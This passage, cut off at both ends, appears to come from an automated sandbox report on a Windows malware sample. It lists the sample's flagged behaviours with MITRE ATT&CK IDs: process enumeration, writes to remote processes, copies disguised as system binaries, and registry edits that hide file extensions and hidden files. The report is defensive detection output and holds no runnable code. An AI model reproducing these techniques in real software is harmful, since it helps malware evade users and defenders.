8987fc4e72a4db01 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToLocalFileTime\" with parameter ace68d8b61a4db01 & acb6164f72a4db01 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToLocalFileTime\" with parameter ? & 0a0f335172a4db01 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToLocalFileTime\" with parameter 4c08cf8e61a4db01 & 4cd8575272a4db01 (UID: 00000000-00005136)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005136)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (UID: 00000000-00005136)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005404)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005412)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005436)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005620)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005156)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005324)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005244)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005628)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005348)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005364)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005916)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005808)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005284)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000908)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005432)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005232)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003448)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002104)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004752)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005636)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001456)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005520)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001288)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006012)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005836)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005072)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005700)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006092)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006088)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003240)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005192)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004924)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004560)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005728)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005884)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004588)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005644)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003984)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003652)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003728)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001828)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004136)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005688)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005420)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005992)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003376)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001164)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002668)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005888)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003388)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003384)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001612)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"K:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"L:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"M:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"N:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"O:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"P:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"Q:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"R:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"S:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"T:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"U:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"V:\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" allocated memory in \"C:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 576)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 576)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 576)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 608)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 576)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 576)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 576)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 424)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 424)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 424)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-15", "type": 3, "relevance": 5, "name": "Changes file extension appearance of the explorer", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"D3_08.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"IExplorer.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"WINLOGON.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: 